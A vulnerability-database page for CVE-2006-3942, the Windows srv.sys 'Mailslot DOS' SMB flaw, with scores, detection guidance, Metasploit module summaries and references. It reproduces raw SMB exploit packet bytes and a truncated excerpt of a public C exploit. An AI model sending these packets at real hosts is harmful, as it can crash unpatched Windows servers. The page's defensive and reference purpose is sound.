CVE-2006-3942
published 2006-07-31CVE-2006-3942: The server driver (srv.sys) in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (system crash) via an…
PriorityP349high7.8CVSS 2.0
AVNACLAuNCNINAC
EXPLOIT
EPSS
75.74%
99.5th percentile
The server driver (srv.sys) in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (system crash) via an SMB_COM_TRANSACTION SMB message that contains a string without null character termination, which leads to a NULL dereference in the ExecuteTransaction function, possibly related to an "SMB PIPE," aka the "Mailslot DOS" vulnerability. NOTE: the name "Mailslot DOS" was derived from incomplete initial research; the vulnerability is not associated with a mailslot.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00
bytes↗
\x00\x00\x00\x56\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x88\x05\x00\x08\x00\x00\x11\x00\x00\x01\x00\x00\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x00\x01\x00\x55\x00\x03\x00\x01\x00\x00\x00\x00\x00\x11\x00\x5c\x4d\x41\x49\x4c\x53\x4c\x4f\x54\x5c\x4c\x41\x4e\x4d\x41\x4e\x41
- →Detect SMB_COM_TRANSACTION (SMB command 0x25) packets targeting \MAILSLOT\ paths that lack null termination in the transaction name string — this triggers the NULL dereference in ExecuteTransaction in srv.sys. ↗
- →Alert on SMB mailslot write responses where the two-byte field in the response packet is consistently set to 0xFFFF — indicative of the ms06-035 kernel pool corruption variant. ↗
- →Inspect srv.sys kernel driver for unexpected NULL dereferences originating from the ExecuteTransaction function, which is the crash point for this vulnerability. ↗
- ·The vulnerability name 'Mailslot DOS' is a misnomer from incomplete initial research — the flaw is not actually associated with a mailslot in the traditional sense, so detection rules should not be scoped exclusively to mailslot traffic. ↗
- ·Two separate but related bugs exist under MS06-035: a kernel pool corruption via mailslot write (slow, two-byte overwrite) and a NULL pointer dereference via SMB PIPE transaction with no null termination (ms06_063_trans). Detection logic should cover both variants. ↗
- ·The NULL pointer dereference variant (ms06_063_trans) was independently discovered by CORE Security and ISS, meaning public exploit code from multiple sources may differ in structure. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows - Mailslot Ring0 Memory Corruption (MS06-035)
exploitdb·2006-07-21
CVE-2006-3942 Microsoft Windows - Mailslot Ring0 Memory Corruption (MS06-035)
Microsoft Windows - Mailslot Ring0 Memory Corruption (MS06-035)
---
#include
#include
#include
/*******************************************************************
Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit
by cocoruder(frankruder_at_hotmail.com),2006.7.19
page:http://ruder.cdut.net
*******************************************************************/
unsigned char SmbNeg[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
unsigned char Session_Setup_AndX_Request[]=
"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\
Metasploit
Microsoft SRV.SYS Mailslot Write Corruption
metasploit
Microsoft SRV.SYS Mailslot Write Corruption
Microsoft SRV.SYS Mailslot Write Corruption
This module triggers a kernel pool corruption bug in SRV.SYS. Each call to the mailslot write function results in a two byte return value being written into the response packet. The code which creates this packet fails to consider these two bytes in the allocation routine, resulting in a slow corruption of the kernel memory pool. These two bytes are almost always set to "\xff\xff" (a short integer with value of -1).
Metasploit
Microsoft SRV.SYS Pipe Transaction No Null
metasploit
Microsoft SRV.SYS Pipe Transaction No Null
Microsoft SRV.SYS Pipe Transaction No Null
This module exploits a NULL pointer dereference flaw in the SRV.SYS driver of the Windows operating system. This bug was independently discovered by CORE Security and ISS.
No writeups or analysis indexed.
http://blogs.technet.com/msrc/archive/2006/07/28/443837.aspxhttp://secunia.com/advisories/21276http://securitytracker.com/id?1016606http://securitytracker.com/id?1017035http://www.coresecurity.com/common/showdoc.php?idx=562&idxseccion=10http://www.osvdb.org/27644http://www.securityfocus.com/archive/1/443287/100/200/threadedhttp://www.securityfocus.com/archive/1/449179/100/0/threadedhttp://www.securityfocus.com/bid/19215http://www.vupen.com/english/advisories/2006/3037http://xforce.iss.net/xforce/alerts/id/231https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-063https://exchange.xforce.ibmcloud.com/vulnerabilities/27999https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A428http://blogs.technet.com/msrc/archive/2006/07/28/443837.aspxhttp://secunia.com/advisories/21276http://securitytracker.com/id?1016606http://securitytracker.com/id?1017035http://www.coresecurity.com/common/showdoc.php?idx=562&idxseccion=10http://www.osvdb.org/27644http://www.securityfocus.com/archive/1/443287/100/200/threadedhttp://www.securityfocus.com/archive/1/449179/100/0/threadedhttp://www.securityfocus.com/bid/19215http://www.vupen.com/english/advisories/2006/3037http://xforce.iss.net/xforce/alerts/id/231https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-063https://exchange.xforce.ibmcloud.com/vulnerabilities/27999https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A428
2006-07-31
Published